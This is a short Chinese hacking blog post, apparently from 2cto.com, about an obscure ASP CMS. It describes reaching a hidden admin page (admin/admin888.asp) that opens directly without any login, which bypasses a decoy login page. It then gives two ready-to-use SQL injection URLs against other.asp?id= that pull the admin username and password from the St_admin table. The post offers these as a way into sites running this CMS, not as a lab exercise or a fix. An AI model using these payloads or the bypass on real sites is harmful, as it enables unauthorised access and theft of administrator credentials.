闷死
这个cms本来不值得提的..程序漏洞多多的.. 很多人都没见过这cms吧...
-------------------------正题------------------------
今天冰封大哥..在群里发了一个网站..问有人见过没...打开一看..没人知道...HOHO现在程序好多啊..尤其是
asp的..随便改下就是自己的cms了..www.xx.com 打开一看..加了个admin/admin_login.asp来到后台..居然是
个 叫做网站后台管理登陆管理员验证程序.. 如图所示:
这下傻眼了都...后来冰封大哥..还是进了后台..问他怎么进的..他输入admin888进去了...我这时好奇..也输入
admin888跳到admin888.asp页面 - -如图所示:
原来真正的后台在这里..我又好奇试下如果直接跳到admin888.asp呢?是否也会成功...
www.xx.com/admin/admin888.asp传到别的群里有人能打开...呵呵..那么前面的admin_login.asp是虚的了?
进后台..打包下载程序..看注入..好几处注入..
下面给出注入语句:
www.2cto.com/other.asp?id=1 and 1=2 union select 1,2,admin_name,4,5,6,7,8 from St_admin
www.2cto.com//other.asp?id=1 and 1=2 union select 1,2,admin_pass,4,5,6,7,8 from St_admin
-----------------------结束语--------------------------------
只是觉得好奇有了此文..怕大家下次碰到此cms..也可以直接跳过...呵呵